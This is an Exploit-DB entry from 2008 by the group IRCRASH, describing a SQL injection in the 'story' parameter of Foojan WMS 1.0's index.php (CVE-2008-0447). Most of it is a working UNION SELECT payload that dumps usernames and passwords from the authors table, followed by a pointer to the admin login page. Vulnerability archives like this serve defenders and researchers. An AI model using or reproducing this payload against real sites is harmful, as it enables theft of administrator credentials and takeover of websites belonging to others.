Foojan Wms 1.0 index.php story Remote SQL Injection Vulnerability

2008-01-23T00:00:00
ID EDB-ID:4968
Type exploitdb
Reporter Khashayar Fereidani
Modified 2008-01-23T00:00:00

Description

Foojan WMS 1.0 (index.php story) Remote SQL Injection Vulnerability. CVE-2008-0447. Webapps exploit for php platform

                                        
                                            #####################################################################################
####                  Foojan WMS 1.0 Remote Sql Injection                        ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://www.iranscripts.com/download/Foojan-WMS1.0%20Full.rar     #
#                                                                                   #
#Injection Adress :  http://Sitename/index.php?story=[SQL CODE]                     #
#                                                                                   #
#                                                                                   #
#[SQL CODE] : 1%27union/**/select/**/0,concat(0x55736572203a20,UserName,0x202b2050617373776f7264203a,PassWord),2,3,4,5,6,7,8/**/from/**/authors/*
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Admin Page For Login is ./admin.php                                                 #
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-23]